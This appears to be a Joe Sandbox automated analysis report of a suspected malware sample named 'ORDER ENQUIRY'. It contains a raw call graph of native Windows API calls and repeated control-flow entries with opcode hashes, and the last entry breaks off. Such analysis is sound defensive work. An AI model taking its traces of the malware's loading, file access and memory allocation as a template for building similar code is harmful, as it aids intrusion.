99257 41cf30 99256->99257 99258 41cf36 99256->99258 99257->99122 99259 41bf80 2 API calls 99258->99259 99260 41cf5c 99259->99260 99260->99122 99262 41cfc0 99261->99262 99263 41bf80 2 API calls 99262->99263 99264 41d01d 99262->99264 99265 41cffa 99263->99265 99264->99130 99266 41bdb0 2 API calls 99265->99266 99266->99264 99267->99126 99268->99140 99269->99142 99270->99145 99271->99147 99272->99149 99274 41ac3b 99273->99274 99275 41bb30 2 API calls 99273->99275 99276 414e40 LdrLoadDll 99274->99276 99275->99274 99277 41ac5b 99276->99277 99278 414e40 LdrLoadDll 99277->99278 99279 41ad07 99277->99279 99278->99279 99279->99173 99280->99250 99282 1af2c1f LdrInitializeThunk 99281->99282 99283 1af2c11 99281->99283 99282->99021 99283->99021 99285 41a67c RtlFreeHeap 99284->99285 99286 41af50 LdrLoadDll 99284->99286 99285->99025 99286->99285 99288 407eb0 99287->99288 99289 407eab 99287->99289 99290 41bd30 2 API calls 99288->99290 99289->98940 99293 407ed5 99290->99293 99291 407f38 99291->98940 99292 419eb0 2 API calls 99292->99293 99293->99291 99293->99292 99294 407f3e 99293->99294 99298 41bd30 2 API calls 99293->99298 99303 41a5b0 99293->99303 99296 407f64 99294->99296 99297 41a5b0 2 API calls 99294->99297 99296->98940 99299 407f55 99297->99299 99298->99293 99299->98940 99301 41a5b0 2 API calls 99300->99301 99302 40817e 99301->99302 99302->98897 99304 41af50 LdrLoadDll 99303->99304 99305 41a5cc 99304->99305 99306 41a5e3 99305->99306 99308 1af2c70 LdrInitializeThunk 99305->99308 99306->99293 99308->99306 99310 41b5b3 99309->99310 99313 40ace0 99310->99313 99312 409c3a 99312->98903 99315 40ad04 99313->99315 99314 40ad0b 99314->99312 99315->99314 99316 40ad40 LdrLoadDll 99315->99316 99317 40ad57 99315->99317 99316->99317 99317->99312 99319 40b053 99318->99319 99321 40b0d0 99319->99321 99333 419c80 LdrLoadDll 99319->99333 99321->98910 99323 41af50 LdrLoadDll 99322->99323 99324 40f1ab 99323->99324 99324->98918 99325 41a7c0 99324->99325 99326 41af50 LdrLoadDll 99325->99326 99327 41a7df LookupPrivilegeValueW 99326->99327 99327->98914 99329 41a26c 99328->99329 99330 41af50 LdrLoadDll 99328->99330 99334 1af2ea0 LdrInitializeThunk 99329->99334 99330->99329 99331 41a28b 99331->98915 99333->99321 99334->99331 99336 40b1e0 99335->99336 99337 40b030 LdrLoadDll 99336->99337 99338 40b1f4 99337->99338 99338->98852 99340 40ae41 99339->99340 99341 40ae3d 99339->99341 99342 40ae5a 99340->99342 99343 40ae8c 99340->99343 99341->98854 99385 419cc0 LdrLoadDll 99342->99385 99386 419cc0 LdrLoadDll 99343->99386 99345 40ae9d 99345->98854 99347 40ae7c 99347->98854 99349 40f490 3 API calls 99348->99349 99350 4143b6 99348->99350 99349->99350 99350->98856 99387 4087a0 99351->99387 99354 408a9d 99354->98858 99355 4087a0 19 API calls 99356 408a8a 99355->99356 99356->99354 99405 40f700 10 API calls 99356->99405 99359 41af50 LdrLoadDll 99358->99359 99360 41a50c 99359->99360 99524 1af2e80 LdrInitializeThunk 99360->99524 99361 40c312 99363 40f490 99361->99363 99364 40f4ad 99363->99364 99525 419fb0 99364->99525 99367 40f4f5 99367->98862 99368 41a000 2 API calls 99369 40f51e 99368->99369 99369->98862 99371 41af50 LdrLoadDll 99370->99371 99372 41a01c 99371->99372 99531 1af2d10 LdrInitializeThunk 99372->99531 99373 40c375 99373->98868 99373->98871 99376 41af50 LdrLoadDll 99375->99376 99377 41a06c 99376->99377 99532 1af2d30 LdrInitializeThunk 99377->99532 99378 40c449 99378->98879 99381 41af50 LdrLoadDll 99380->99381 99382 419e2c 99381->99382 99533 1af2fb0 LdrInitializeThunk 99382->99533 99383 40c49c 99383->98883 99385->99347 99386->99345 99388 407ea0 4 API calls 99387->99388 99403 4087ba 99387->99403 99388->99403 99389 408a3f 99390 408160 2 API calls 99389->99390 99392 408a49 99390->99392 99392->99354 99392->99355 99394 419ef0 2 API calls 99394->99403 99396 41a480 LdrLoadDll NtClose 99396->99403 99399 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99399->99403 99402 419e10 2 API calls 99402->99403 99403->99389 99403->99392 99403->99394 99403->99396 99403->99399 99403->99402 99406 419d00 99403->99406 99409 4085d0 99403->99409 99421 40f5e0 LdrLoadDll NtClose 99403->99421 99422 419d80 LdrLoadDll 99403->99422 99423 419db0 LdrLoadDll 99403->99423 99424 419e40 LdrLoadDll 99403->99424 99425 4083a0 99403->99425 99441 405f60 LdrLoadDll 99403->99441 99405->99354 99407 419d1c 99406->99407 99408 41af50 LdrLoadDll 99406->99408 99407->99403 99408->99407 99410 4085e6 99409->99410 99442 419870 99410->99442 99412 408771 99412->99403 99413 4085ff 99413->99412 99463 4081a0 99413->99463 99415 4086e5 99415->99412 99416 4083a0 11 API calls 99415->99416 99417 408713 99416->99417 99417->99412 99418 419ef0 2 API calls 99417->99418 99419 408748 99418->99419 99419->99412 99420 41a4f0 2 API calls 99419->99420 99420->99412 99421->99403 99422->99403 99423->99403 99424->99403 99426 4083c9 99425->99426 99503 408310 99426->99503 99429 41a4f0 2 API calls 99430 4083dc 99429->99430 99430->99429 99431 408467 99430->99431 99432 408462 99430->99432 99511 40f660 99430->99511 99431->99403 99433 41a480 2 API calls 99432->99433 99434 40849a 99433->99434 99434->99431 99435 419d00 LdrLoadDll 99434->99435 99436 4084ff 99435->99436 99436->99431 99515 419d40 99436->99515 99438 408563 99438->99431 99439 414a40 8 API calls 99438->99439 99440 4085b8 99439->99440 99440->99403 99441->99403 99443 41bf80 2 API calls 99442->99443 99444 419887 99443->99444 99470 409310 99444->99470 99446 4198a2 99447 4198e0 99446->99447 99448 4198c9 99446->99448 99451 41bd30 2 API calls 99447->99451 99449 41bdb0 2 API calls 99448->99449 99450 4198d6 99449->99450 99450->99413 99452 41991a 99451->99452 99453 41bd30 2 API calls 99452->99453 99455 419933 99453->99455 99460 419bd4 99455->99460 99476 41bd70 99455->99476 99457 419bc0 99458 41bdb0 2 API calls 99457->99458 99459 419bca 99458->99459 99459->99413 99461 41bdb0 2 API calls 99460->99461 99462 419c29 99461->99462 99462->99413 99464 40829f 99463->99464 99466 4081b5 99463->99466 99464->99415 99465 414a40 8 API calls 99468 408222 99465->99468 99466->99464 99466->99465 99467 408249 99467->99415 99468->99467 99469 41bdb0 2 API calls 99468->99469 99469->99467 99471 409335 99470->99471 99472 40ace0 LdrLoadDll 99471->99472 99473 409368 99472->99473 99474 40938d 99473->99474 99479 40cf10 99473->99479 99474->99446 99497 41a570 99476->99497 99480 40cf3c 99479->99480 99481 41a1d0 LdrLoadDll 99480->99481 99482 40cf55 99481->99482 99483 40cf5c 99482->99483 99490 41a210 99482->99490 99483->99474 99487 40cf97 99488 41a480 2 API calls 99487->99488 99489 40cfba 99488->99489 99489->99474 99491 41af50 LdrLoadDll 99490->99491 99492 41a22c 99491->99492 99496 1af2ca0 LdrInitializeThunk 99492->99496 99493 40cf7f 99493->99483 99495 41a800 LdrLoadDll 99493->99495 99495->99487 99496->99493 99498 41af50 LdrLoadDll 99497->99498 99499 41a58c 99498->99499 99502 1af2f90 LdrInitializeThunk 99499->99502 99500 419bb9 99500->99457 99500->99460 99502->99500 99504 408328 99503->99504 99505 40ace0 LdrLoadDll 99504->99505 99506 408343 99505->99506 99507 414e40 LdrLoadDll 99506->99507 99508 408353 99507->99508 99509 40835c PostThreadMessageW 99508->99509 99510 408370 99508->99510 99509->99510 99510->99430 99512 40f673 99511->99512 99518 419e80 99512->99518 99516 41af50 LdrLoadDll 99515->99516 99517 419d5c 99516->99517 99517->99438 99519 41af50 LdrLoadDll 99518->99519 99520 419e9c 99519->99520 99523 1af2dd0 LdrInitializeThunk 99520->99523 99521 40f69e 99521->99430 99523->99521 99524->99361 99526 41af50 LdrLoadDll 99525->99526 99527 419fcc 99526->99527 99530 1af2f30 LdrInitializeThunk 99527->99530 99528 40f4ee 99528->99367 99528->99368 99530->99528 99531->99373 99532->99378 99533->99383 99536 1af2ad0 LdrInitializeThunk

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 41a3fc-41a449 call 41af50 NtReadFile
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID: !JA$bMA$bMA
                                                                                                                                                                          • API String ID: 2738559852-4222312340
                                                                                                                                                                          • Opcode ID: 810d5cb43e145769651c73e418014ac09a1dcbaa7b10a7da9088c6c756a8ac26
                                                                                                                                                                          • Instruction ID: 9d81fa899a4132681739b3ed890e3f8aefbd529ac8edec776db25eb8573ecfe4
                                                                                                                                                                          • Opcode Fuzzy Hash: 810d5cb43e145769651c73e418014ac09a1dcbaa7b10a7da9088c6c756a8ac26
                                                                                                                                                                          • Instruction Fuzzy Hash: 75F0F4B2200108AFCB14DF89DC80EEB77ADEF8C714F118248FE1D97245C630E8528BA4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 3 41a400-41a416 4 41a41c-41a449 NtReadFile 3->4 5 41a417 call 41af50 3->5 5->4
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID: !JA$bMA$bMA
                                                                                                                                                                          • API String ID: 2738559852-4222312340
                                                                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                          • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                                                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                          • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 6 41a34a-41a3a1 call 41af50 NtCreateFile
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID: t8U-
                                                                                                                                                                          • API String ID: 823142352-1836231067
                                                                                                                                                                          • Opcode ID: 3d047a12e86e0060f3c4fec99ac482bed11b1e44987b9d6aceca61a5bb8e7364
                                                                                                                                                                          • Instruction ID: 5684d836d4401de03301fa4ac531b823d2e21afc1e2ba19bbd461c16835d3b5f
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d047a12e86e0060f3c4fec99ac482bed11b1e44987b9d6aceca61a5bb8e7364
                                                                                                                                                                          • Instruction Fuzzy Hash: 57F0CFB2201108AFDB08CF89DC95EEB77ADAF8C754F158649FA1DA7240C630EC51CBA4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 237 40ace0-40ad09 call 41cc40 240 40ad0b-40ad0e 237->240 241 40ad0f-40ad1d call 41d060 237->241 244 40ad2d-40ad3e call 41b490 241->244 245 40ad1f-40ad2a call 41d2e0 241->245 250 40ad40-40ad54 LdrLoadDll 244->250 251 40ad57-40ad5a 244->251 245->244 250->251
                                                                                                                                                                          APIs
                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                          • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                                                                                                                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                          • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 252 41a350-41a366 253 41a36c-41a3a1 NtCreateFile 252->253 254 41a367 call 41af50 252->254 254->253
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                          • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                                                                                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                          • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 255 41a52a-41a56d call 41af50 NtAllocateVirtualMemory
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                          • Opcode ID: bb329d3e206d8cb0afadfb714a2f9d6c46c93fb371c27f8cea12270a62e61297
                                                                                                                                                                          • Instruction ID: 3a8b7ae16d43a5b6780630cf5ea03f75a5d02fcc9936d9f408cbadd04ea999d5
                                                                                                                                                                          • Opcode Fuzzy Hash: bb329d3e206d8cb0afadfb714a2f9d6c46c93fb371c27f8cea12270a62e61297
                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF0F2B6210208ABDB18DF89DC81EEB77A9AF88754F118549BA18A7241C631E951CBA4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 258 41a530-41a546 259 41a54c-41a56d NtAllocateVirtualMemory 258->259 260 41a547 call 41af50 258->260 260->259
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                          • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                                                                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                          • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                          • Opcode ID: f1f7e2854e4d8cd8b94677edc3baa00c143023764aaabac18f040c24d822df96
                                                                                                                                                                          • Instruction ID: 8c681633a3b22e1261c45266d31317880d9b0d1346b3794ab9aa63f2a9f5fe73
                                                                                                                                                                          • Opcode Fuzzy Hash: f1f7e2854e4d8cd8b94677edc3baa00c143023764aaabac18f040c24d822df96
                                                                                                                                                                          • Instruction Fuzzy Hash: 68E08C76640200AFD714DFA4CC86EEB7B69EF84364F14455EB91D9B292C530A9008BD0
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                          • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                                                                                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                          • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: da4093725da007f47b0569a1f7968c934daaf0d3c61ff0b3e3ce01047b4b39e8
                                                                                                                                                                          • Instruction ID: a787c8704dc1b662fff80193c6c8a817af6f8f963a911a7f5f2e4f3ff8b5c5a1
                                                                                                                                                                          • Opcode Fuzzy Hash: da4093725da007f47b0569a1f7968c934daaf0d3c61ff0b3e3ce01047b4b39e8
                                                                                                                                                                          • Instruction Fuzzy Hash: 9090023260180842D1857158440464A040597D1341F95C055A0025699DCB158B9977A1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: e0b2088d070ae7e6ba56f437aab096d46d2282297eaedcc1dc6655e75a02b7f4
                                                                                                                                                                          • Instruction ID: 5c96aef408457ed280fd3883dcbc858769536541f53640441b60911387e76d72
                                                                                                                                                                          • Opcode Fuzzy Hash: e0b2088d070ae7e6ba56f437aab096d46d2282297eaedcc1dc6655e75a02b7f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 0890026260280043410A71584414616440A97E0241B55C061E10145D5DC6258AD16225
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 2cf001f3bf81c96ccf95a41d9d6a8b0b4f6d8823517c08ba0d2a6f39fdd24825
                                                                                                                                                                          • Instruction ID: a3c272fc3d6753fe34b9cc7c6855d88a1e06743edefd4e4e3b63caa25826aef2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf001f3bf81c96ccf95a41d9d6a8b0b4f6d8823517c08ba0d2a6f39fdd24825
                                                                                                                                                                          • Instruction Fuzzy Hash: 9790022661180043010AB5580704507044697D5391355C061F1015595CD7218AA15221
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: e4ff844f74eb8889034fac977234c54372e0a7f8f8c16d5f7045a14561317ec9
                                                                                                                                                                          • Instruction ID: 4625fd114ce2645afef411ebfb12b3f7908b2250e060b89d6289273c21162be5
                                                                                                                                                                          • Opcode Fuzzy Hash: e4ff844f74eb8889034fac977234c54372e0a7f8f8c16d5f7045a14561317ec9
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E90023260180453D11671584504707040997D0281F95C452A042459DDD7568B92A221
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 4bdeafcfaff5bd443f8cd98f5972ae45d3ad3602931c77fb7cba3fc346bce335
                                                                                                                                                                          • Instruction ID: e5d1d78cb13ca353faa0c69b5a9c1c7250b73d7208235d7124401e21932a6232
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdeafcfaff5bd443f8cd98f5972ae45d3ad3602931c77fb7cba3fc346bce335
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D90022264284192554AB15844045074406A7E0281795C052A1414995CC6269A96D721
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 5cf671421cf7985266ba78a0a25ad85213c5620e0ad04b460ae26b652b15bb91
                                                                                                                                                                          • Instruction ID: aa3f59700df4ea21a01dafbe71f5485e58c6fab93c16e0c4866a49b8f115c78e
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cf671421cf7985266ba78a0a25ad85213c5620e0ad04b460ae26b652b15bb91
                                                                                                                                                                          • Instruction Fuzzy Hash: ED90022270180043D145715854186064405E7E1341F55D051E0414599CDA158A965322
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 7a8d68a826b632640ce244288d28c60dcbb5078a5f2813083568e56899e98a0c
                                                                                                                                                                          • Instruction ID: 48fa016c9bf58239440e6d3bd13181afdc0d132546e264381c36be62bb87256a
                                                                                                                                                                          • Opcode Fuzzy Hash: 7a8d68a826b632640ce244288d28c60dcbb5078a5f2813083568e56899e98a0c
                                                                                                                                                                          • Instruction Fuzzy Hash: 9990022A61380042D1857158540860A040597D1242F95D455A001559DCCA158AA95321
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 159f5254c83419512b5514a1806c67b4c11f14a36bfe8d693edac6c92facc208
                                                                                                                                                                          • Instruction ID: d83596a00b7945e667c191641d7a3ad0f3ebe2c5bb572e97272288d31da4b23f
